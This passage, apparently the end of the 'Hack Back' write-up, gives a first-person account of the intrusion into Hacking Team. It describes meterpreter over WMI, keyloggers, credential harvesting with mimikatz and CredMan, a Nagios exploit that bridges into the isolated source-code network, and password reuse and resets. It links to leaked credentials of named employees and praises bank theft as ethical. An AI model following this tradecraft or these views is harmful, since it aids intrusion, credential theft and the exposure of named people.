605. Reading the documentation of their infrastructure [1], I realised I still lacked access to something important - the "Rete Sviluppo", an isolated network that saves the whole RCS source code. A companies' sysadmins always have access to everything. I looked in the computers of Mauro Romeo and Christian
606. Pozzi to see how they handled the sviluppo network, and to see if there were other interesting systems I should investigate. It was simple to access their computers since they were a part of the windows domain in which I had admin access. Mauro Romeo's computer didn't have any open port no,
607. so I opened WMI's port [2] to run meterpreter [3]. Apart from logging keys and screenshots with Get-Keystrokes Get-TimedScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 [4], and searched for archives [5]. Noticing that Pozzi had a Truecrypt volume, I waited until he mounted it to copy the earchives. Many have laughed about the weak passwords of Christian Pozzi (and of Christian Pozzi in general, he makes good comedy material [6][7][8][9]). I included them in the leak as a distraction and for you to laugh at him. The truth is that and the keyloggers see every password equally.
608.  
609. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
610. [2] http://www.hammer-software.com/wmigphowto.shtml
611. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
612. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
613. [5] http://pwnwiki.io/#!presence/windows/find_files.md
614. [6] http://archive.is/TbaPy
615. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
616. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
617. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
618.  
619.  
620. --[ 15 - The bridge]------------------------------------------------------------
621.  
622. Inside the volume encrypted by Christian Pozzi, there was atextfile with many passwords [1]. One of them was to a Fully Automated Nagios serber, that had access to the sviluppo network to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell(the exploit doesn't need authentication, but you need a logged in user with which to use the password from the textfile).
623.  
624. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
625. [2] http://seclists.org/fulldisclosure/2014/Oct/78
626.  
627.  
628. --[ 16 - Reusing and resettingpasswords ]----------------------------
629.  
630. Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had his windows password thanks to mimikatz. I tried it in the git server and it worked. I tried sudo and it worked. For the gitlab server and his twitter account, I used the "forgot my passsword" function and the access I had to the email server to reset the password.
631.  
632. --[ 17 - Done ]-----------------------------------------------------------
633.  
634. That's it. It's this easy to take down a company and stop its abuses against human rights. This is the beauty and asymmetry of hacking: with just a hundred work hours, a single person can undo years of work of a multimillion dollar company. Hacking gives us, the poor, the possibility to fight and win.
635.  
636. Hacking tutorials usually end with a warning: this information is only for educational purposes, be an ethical hacker, don't attack computers without permission, blahblahblah. I'm going to say the same, but a more rebellious concept of ethical hacking. It would be ethical hacking to leak documents, steal money from banks and protect the computers of the common people. With no shame, most people who call themselves ethical hackers work only to protect those that pay their consulting fee, which usually are the same ones that most deserve to get hacked.
637.  
638. In Hacking Team you can see they see themselves as part of a tradition of inspiring Italian design [1]. I see them, Vincenzetti, his company, and his police friends, carabinieri, and government, as part of a large tradition of Italian fascism I want to dedicate this guide to the victims of the raid on the Armando Diaz school, and to those who have shed their blood in the hands of Italian fascists.
639.  
640. [1] https://twitter.com/coracurrier/status/618104723263090688
641.  
642.  
643. --[ 18 - Contact ]-------------------------------------------------------------
644.  
645. To send me spearphishing attempts, death threats written in Italian [1][2], and to gift me with 0days or access inside banks, corporations, governments, etc.
646.  
647. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
648. [2] https://twitter.com/CthulhuSec/status/619459002854977537
649.  
650. Only encrypted emails please:
651. https://securityinabox.org/es/thunderbird_usarenigmail
652. -----BEGIN PGP PUBLIC KEY BLOCK-----
653.  
654. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
655. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
656. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
657. +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
658. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
659. Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
660. Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
661. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
662. QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
663. cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
664. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
665. 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
666. X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
667. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
668. oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
669. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
670. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
671. WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
672. jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
673. CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
674. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
675. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
676. JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
677. Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
678. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
679. =E5+y
680. -----END PGP PUBLIC KEY BLOCK-----
681.  
682.  
683.  
684. If not you, who? If not now, when?
685. _ _ _ ____ _ _
686. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
687. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
688. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
689. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)